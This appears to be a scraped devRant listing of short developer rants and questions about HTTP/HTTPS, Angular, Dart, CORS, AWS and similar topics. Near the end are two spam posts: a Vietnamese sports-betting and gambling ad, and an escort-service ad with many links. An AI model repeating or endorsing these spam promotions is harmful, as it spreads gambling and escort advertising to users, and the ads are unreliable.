User forked UnrealEngine on GitHub and gave write permission and subscribed everyone (~100K)
Thats not how you git it.
https://news.ycombinator.com/item/...
http://imgur.com/a/yVjAM -
Why do people try to answer questions they don't even know what mean...
I want to use a package that's made for nodejs and it's using one of the core module of nodejs (http), so that's a problem because react-native doesn't have that module and I can't just simply install it (it won't work), so I search the web in the quest for a solution maybe a drop-in replacement or a polifill or something, I got to this question that's exactly what I would ask if I were to do the question myself https://stackoverflow.com/questions... asking for a polyfill to use http module in react-native, and the only answer is from a guy that I don't think he even knows what he is talking about, his answer don't make any sense with relation to the question and doesn't even address package http nor polyfill so obviously he didn't even know what the title of the question means...
If you don't fucking know something, just stay fucking silent don't reply with giberish stuff that don't have nothing to do with what people are asking. You don't have know it all, don't feel you have to... and don't try to answer stuff you don't even know.4 -
damn sorry devs , i know you ppl are here for relaxation , but please help me out.
i am creating a browser and wanna have an edittext which works something like this :
>>user enters 'fb' , there should be a google search for fb(i.e load the string "https://www.google.com/search?q=fb")
>> user enters fb.com , webview should open it directly (i.e load the string "https://www.fb.com" )
>> some nerdy user enters http://www.fb.com or https://www.fb.com , it should load that
I know the function to make it load, what i don't know is how to modify that string to show such behaviors .
The webview is dumb enough to not behave like tht by default. although it feels good having such a raw and tool in hand, but hell, its a fucking google's webview! , why can't they just throw in some built in ways to show their search results by default when user enters a malformed url ?? that would be a great source of branding --__--7 -
Do you have any recommendations for API monitoring?
I'm looking for something along the lines of jetbrains or postman http-tests but for multiple environments + notifications (teams, mail, ...).
Doesn't have to be fancy (6 environments, ~25 routes with a couple assertions each).
I was thinking maybe https://assertible.com/?6 -
I wrote a whole article about it, and oh wow, it still exists. It was probably the first optimization I ever did in my life, and it was while I was learning SQL.
And writing an edu-tainment article aimed at total laymen as well as beginners was also fun.
http://swczdev.blogspot.com/2010/...
Sadly, czech language only. But... the english autotranslation actually looks readable:
https://translate.google.com/transl...
Long story short, though: 4 or 5-table join going from 7 seconds before optimization, to 0.08 seconds after optimization. Both were written by me, the optimized one was written without any reading on how to optimize SQL, based purely on me actually stopping to think about how I can reduce the DB load based on the little that I knew about how SQL servers work.
Optimization made it about 99,9999422% more efficient, based on my improvised efficiency metric of how many rows the query retrieves and produces versus how many are thrown away on the end due to the WHERE part of the query.
And that was also the day when my question of "what is there even to optimize in SQL?) was answered... by myself.3 -
So i just learned aws elastic beanstalk (EBS, ECS, ALB, EC2, Amplify, S3, RDS, SQS)
Essentially i learned how to operate with aws to deploy a full stack web application with custom backend i built, with security and jwt token, certificate manager, ssl/tls to set up https and redirect from http, and react/angular/nextjs on frontend
All with custom CI/CD pipelines docker and other devops shit
But i still feel like im missing on A Lot of stuff regarding aws. I havent worked with Fargate for example and dont know how it works or when to use it, but i heard other devs use it
Can someone list me a number of things i as a dev should know more regarding aws?3 -
As this weeks rant is about how to improve CS education I want to share one new university in Berlin called CODE that does many things quite differently:
From the beginning students are working together in small interdisciplinary teams on projects. Meaning software developers, interaction designers and product managers are all already working together. The projects are developed in collaboration with companies and usually last a couple of weeks to multiple months. The students are supposed to learn more if they are faced with an actually problem instead of learning with frontal teaching (“Frontalunterricht”) in a lecture hall.
The founder himself started programming in his teens but studied business administration because he found that the CS courses had an outdated didactic.
PS: And if you are in Germany and between 15 and 21 years old have a look at the “Code+Design Camps”. They are basically longer Hackathons (4 days) with professional mentoring from programmers, designers, … from the industry. I attended four in total (all over Germany) and they were a lot of fun!!!
What do you all think about this?
Website: https://code.berlin/en/
English Article: https://global.handelsblatt.com/com...
Some Articles in German:
http://faz.net/aktuell/finanzen/...
http://sueddeutsche.de/wirtschaft/...2 -
I have been really busy lately so I would like to try and get rid of some running projects.
This means I am putting http://jsrant.com up for adoption. If you are interested in maintaining that project, contact me on GitHub: https://github.com/ChappIO/jsRant3 -
In addition to being able to lookup DNS queries over Twitter, telegram (even literal ones), devRant, HTTP(s), TLS and even the DNS protocol itself - Cloudflare will now offer DNS-over-HAM in London.
Sources:
- Heise Online (German): https://heise.de/newsticker/...
- Original Tweet: https://mobile.twitter.com/jgrahamc...1 -
"We'll publish critical vulnerabilities in PGP/GPG and S/MIME email encryption on 2018-05-15 07:00 UTC. They might reveal the plaintext of encrypted emails, including encrypted emails sent in the past. #efail 1/4"
https://twitter.com/seecurity/...
Let's see how this unfolds. While there is chaos I trink some tea and laugh, because I never send critical information over e-mail. 🧐🍵4 -
If anyone is good with dart (or) other single threaded programming languages, i have this small doubt about the inner workings of the event loop and such and i would like an explanation if possible.
If you're too lazy to goto the link:
1. I have a future returned from a http request.
2. a future.then is declared that prints the http result.
3. A separate while(true) loop is declared that runs forever that just prints natural numbers.
4. the while loop also has an await future.delay that waits for 1ms before continuing with the next iteration
My question :
1. There's only one thread so how does the http download code run WHILE my main loop is still executing.
2. my future.then event is not processed unless i await a future.delay separately for 1ms. returning control to the event loop ? i don't get it how does adding an event help it process a prior event? It's FIFO ?
gist :https://gist.github.com/TheAnimatri...
discussion:
https://groups.google.com/a/...5 -
We have 2 sites. I, dev, set the https system for one in 10 minutes. The sys admin has been working on it for two hours already and he doesn't want help2
-
Just discovered wizzy ... Wow, freaking sweet!
https://github.com/utkarshcmu/wizzy
I like it for many reasons, just started playing with it, therefore #1 reason so far is saving dashboards and having them in a git version control, yay!!!
Also, if you're not familiar with Grafana, let me blow your mind: http://grafana.org4 -
soooo... after posting this:
https://devrant.com/rants/1039485
i can now safely say that ofqual have cancelled the entire programming task in the computer science gcse after most people have finished because they realised people have the ability to share their solutions outside of exam conditions, ok
http://bbc.co.uk/news/... -
So recently I've been feeling like I fooled myself into thinking I'm any good at anything regarding development.
Today I tried to deploy a Console Application that would run nightly. The production systems are much more guarded, as it should be, but I should still be able to schedule a windows task (yeah yeah, windows servers, not the time Linux fanboys and not my choice :P) no problem.
Except I didn't expect that network users can't run jobs, because of a Group Policy about saving passwords on network accounts.
I expected a local administrator account to be available, and it wasn't.
Also a web API isn't available, even though I could telnet to the address on port 443 (HTTPS). A proxy apparently accepts all HTTP/HTTPS traffic and so on.
All this I feel like I should have known....
So am I in my own head, or am I right in thinking maybe I'm not "pro" development yet? Maybe I don't deserve to be "pro".
Thoughts?4 -
One of the great things about learning things from teachers rather than Youtube videos is getting their experiences and perspectives as part of the education. So what I'd (in bold as well) like to know is WHY THE FUCK THEY DON'T DO THAT???
So here's the thing, my class has two teachers. One for systems development and another for programming. We have also had two different teachers the last two semesters. This rant applies to all four of them.
For instance, a few weeks ago we had about patterns (for the second time) where our sysdev teacher presented some of them in a powerpoint that was pretty much just copy paste from a site called dofactory and this https://slideshare.net/HermanPeeren.... It looks like this:
https://imgur.com/a/39ftuUA
Of course, she didn’t want to talk about implementation which was pretty annoying. But even more annoying was the fact that what we were told of her time in the industry with these patterns were “I used that and that is used” and not, you know, “when I worked for blank I used this in such a way”.
Our programming teacher(s) aren’t much different. In the past two weeks we’ve been shown WCF. That is all fine and dandy, but when I asked if anyone used it (as I had never seen an api look like http://localhost/Service1.svc/...) he couldn’t answer. He seemed to think that there were no other ways to do REST.
Overall I think the biggest problem with this education is the fact that there’s no “why”. During the WCF stuff there were an interface called “IService1” which he added methods and attributes to. -
Hi fellas, I am having problems to play widevine content in electron. I am trying to convert ember-app to electron app. Except widevine content everything works great, Version info are:
Shaka 2.02
Electron 1.4.13(Chromium 53)
Electron Packager 8.4.0
Widevine v1.4.8.903
I used http://electron.atom.io/docs/... docs. In order to check my player i load shaka-demo app.
I included widevine like this
``` app.commandLine.appendSwitch('widevine-cdm-path', path.join(__dirname, ./widevine/1.4.8.903/_platform_specific/linux_x64/libwidevinecdmadapter.so)); app.commandLine.appendSwitch('widevine-cdm-version', '1.4.8.903');
```
Also added plugins: true. When i load mainWindow.loadURL('https://shaka-player-demo.appspot.com/...'); to play widevine content it's disabled. I have tried navigator.plugins still can not play widevine content2 -
My browser claims it's unsafe to visit a website via HTTP, even if it's only to view and read. But it's fine to open any crapsite as long as it's via HTTPS and not on a malware blocklist?2
-
I swear to god dio and dart's http client is so fucking stupid. I can barely do something in 90 lines to get a web resource when I can do it in 10 with python's requests library. The support for storing cookies is nonexistent, and even with CookieJar/Dio I still need some stupid long hack like this:
https://stackoverflow.com/a/...
The worst thing is that this has happened twice now, the first time I resolved after a long fucking time trying to solve it, and now I have the same exact problem again, but I can't just simply copy my solution from last time to use in the latest problem.
Even curl is more useful than whatever the hell the http client for dart is1 -
Could someone please tell me what model of router uses Https for their admin page? I went to the store and I noticed most of them had http. What is the point in making the right setting if in the first place the connection is not secure?! :S59
-
Somebody forgot to correctly match the external url on login success and failure, now google may use my cookies for the better good.
https://symfony.com/blog/... -
Wifi used to be an issue in my incubator. Like I had mentioned in my earlier rant. There are many wifi's available now, but once when there was only one wifi available. That wifi network, was so terrible that it asks for human verification number of times even on google searches.
And the person responsible for wifi, is one of the most useless, undeserved person, I had ever seen
When a team from incubator talked to him about the issue, that this particular wifi's is pathetic, too many blocks and always asking for human verification, his reply was
"Just write 'S' after 'http', then it will work"
No doubt, everybody hates that guy.
But that guy cant be fired from job, because government. But he can be FIRED -
Can somebody give working example how to solve
Access to XMLHttpRequest at 'localhost:8000/index.php/api/companies/1/logo' from origin 'http://localhost:8080' has been blocked by CORS policy: Cross origin requests are only supported for protocol schemes: http, data, chrome, chrome-extension, chrome-untrusted, https.
this error is talked so much but no working solution I can find. Maybe it is somewhere but cannot find so far in the internet trash.
Nginx server.
Not by installing chrome plugin, because other people would also need to install it. Thats not a solution.20 -
Wow, angular is still a pile of shit in 2024, nothing changed.
I renew my https://devrant.com/rants/7582990 previous rant
I've recently switched to angular 17, not because I'm a masochist, but because, unfortunately, we have a huge portal for a super huge multinational enterprise and it's made in angular.
It's 2 years worth of work, and they've suddenly decided it's cool to switch to angular 17, because standards, because it's new etc.
Now that this crap angular 17 came out I prepared my hair pulling room, where there are whips and self torture instruments, and I've typed into browser url they "super new super modern super efficient" angular.dev, which apparently is their new official super 1337 documentation site (spoiler, it's shit as the other if not worse).
Since they realized angular was pigshit, they decided to eviscerate it like a sacrifical lamb in ancient maya age and add lot of stuff that makes it modern and more friendly.
They think they made the big bang of news, but they implemented stuff that exist since 10 years after people were cutting their wrists in their github "request a feature" section for years.
Well, to make it brief, they made a whole clunky obscure way to bootstrap it and didn't even had the decency and modesty to properly document it (they never learn, sigh....)
In any case I put up a .NET minimal API that works well, and a small angular app with a Hello world page that fetches a "hello word" string from a test api route.
The api works everywhere, browser, postman etc etc.
But ta-dahhhh, in angular throws error.
They put various way of using http client. Main 2 are withFetch() and without.
withFetch() says "as error "Invalid self signed certificate" and withoutFetch "Unknown error".
Apparently we have to do shenanigans also to do some dev development3 -
Anyone here use the NodeJS HTTP/2 API? I started working with it the other day and I can get static files served fine with it but when I try and use it's push feature to "bundle" additional resources that the page will need, it doesn't seem to work, the client still requests the resources from the server instead of looking in the "push" cache. Also the load time seems longer when using http/2 vs 1, was wondering if anyone else had come across these issues and found workarounds. P.S. - I'm using Chrome to test on, with https://localhost and some self-signed certs as http/2 isn't implemented in browser unless using https1
-
http://dpaste.com/14GSRTM
I have both tried this with Grub 2.04 and 2.02 Why apparently this has been a bug as far back as https://lists.gnu.org/archive/html/... This is either a fault in how I've set up my lfs system thus far or it must be some sort of oversight ugh!!!! -
General inquiry and also I guess spreading awareness (for lack of a better category as far as I can tell) considering nothing turned up when I searched for it on here: what do you guys think about Sourcehut?
For those who don't know about it, I find it a great alternative to GitHub and GitLab considering it uses more federated collaboration methods (mostly email) mostly already built into Git which in fact predate pull requests and the like (all while providing a more modern web interface to those traditional utilities than what currently exists) on top of many other cool features (for those who prefer Mercurial, it offers first-class repo support too, and generally it also has issue tracking, pastebins, CI services, and an equivalent to GitHub Pages over HTTP as well as Gemini in fact, to name a few; it's all on its website: https://sourcehut.org/). It's very new (2019) and currently in public alpha (seems fairly stable though actually), but it will be paid in the future on the main instance (seems easy enough to self-host though, specially compared to GitLab, so I'll probably do that soon); I usually prefer not to have to pay but considering it seems to be done mostly by 1 guy (who also maintains the infrastructure) and considering how much I like it and everything it stands for, here I actually might 😅2 -
Why are there so many template languages? Do people enjoy them? I certainly don't.
What is the problem with just using functions? E.g. using https://j2html.com/ or http://www.lihaoyi.com/scalatags/
You can do code reuse with functions, for-loops, classes, interfaces etc.
Why are they avoided in Spring, PlayFramework and similar? -
Hi all! I want to share my site (https://tinytunes.app/ ) , which I completely created myself. Some information about how I created it:
1) I bought a domain that was freed from the previous owner (here https://mydrop.io/en/ )
2) Next, using the web archive, I restored the information of the main page - http://web.archive.org/web/...
3) website banner and logo created by myself using the service Canva
4) The theme for the site was used by Balanced Blog, but the main page of the site was created from scratch (without editing the template).
5) I added a few more pages to the site and a blog, which I am now actively filling
I would like to read the opinions of professionals: what was done wrong on the site, there may be some comments (some shortcomings, very noticeable) ...
From what I see myself: H1 headers - two instead of one (haven't figured out how to change that yet)
And the footer of the site - remove information about wordpress, add something like "2023 tinytunes.app All rights reserved. - I already figured out how to do this, I'll fix it soon)
I'm just starting to learn web programming, this site is only 3 months old. With knowledge of codes, everything is very weak for me - I study on my own from open free sources.16 -
Don't know if you know this music but... BEST SONG FOR A DEV EVER 😀 lyrics on github
http://youtube.com/watch/...
https://github.com/niclupien/Songs/... -
I am newbie to Ubuntu from windows
.
.
.
I installed nodejs in windows with few seconds
.
.
.
But here ubuntu i trying since last one week.
.
.
Error Posted on github (https://github.com/nodejs/...)
.
and
.
askUbuntu(http://askubuntu.com/questions/...)
.
.
No solution thinking back to windows.......................................12 -
Keomacao cung cấp liên tục và nhanh chóng tất cả các kèo bóng diễn ra trong ngày . Từ các giải đâu châu Âu như: NHA, C1, Liga, Serie A, Bundesliga,....vv đến các giải châu Á như: U23, U22...vv Đến các giải đấu trên trường quốc tế như World Cup. Cung cấp dịch vụ xem trực tuyến bóng đá, 7m.cn, bắn cá ăn tiền
Danh sách web phát sóng bóng đá miễn phí
Web: https://keomacao.com/truc-tiep-bong...
http://keo79.com/vaoroi-tv-xem-bong... -
Does no one check the dev console before comming to you about site code not working?
It says it right there!
You can't load a src with http while the site is https. -
Jaipur Escort Services is usually a remarkable choice definitely. If you are searching for your great mixture of appeal and minds to thrill in with, there after this is the best spot for you. Our Jaipur model escorts are glamorous, well presented which will melt via the moment you meet them. They dress immaculately and you will even choose their outfits before they get to your appointment.
http://www.neha-tyagi.com
http://www.heenakhan.com
http://snehadespandey.com
http://www.dikshaarya.com
http://www.aliyasinha.com
http://sapna-chaudhary.com/cheap-es...
http://heenakhan.com/bhopal-call-gi...
http://aliyasinha.com/escorts-udaip...
http://heenakhan.com/kochi-call-gir...
http://heenakhan.com/pune-call-girl...
http://heenakhan.com/mysore-call-gi...
http://neha-tyagi.com/udaipur-escor...
https://comicvine.gamespot.com/prof...2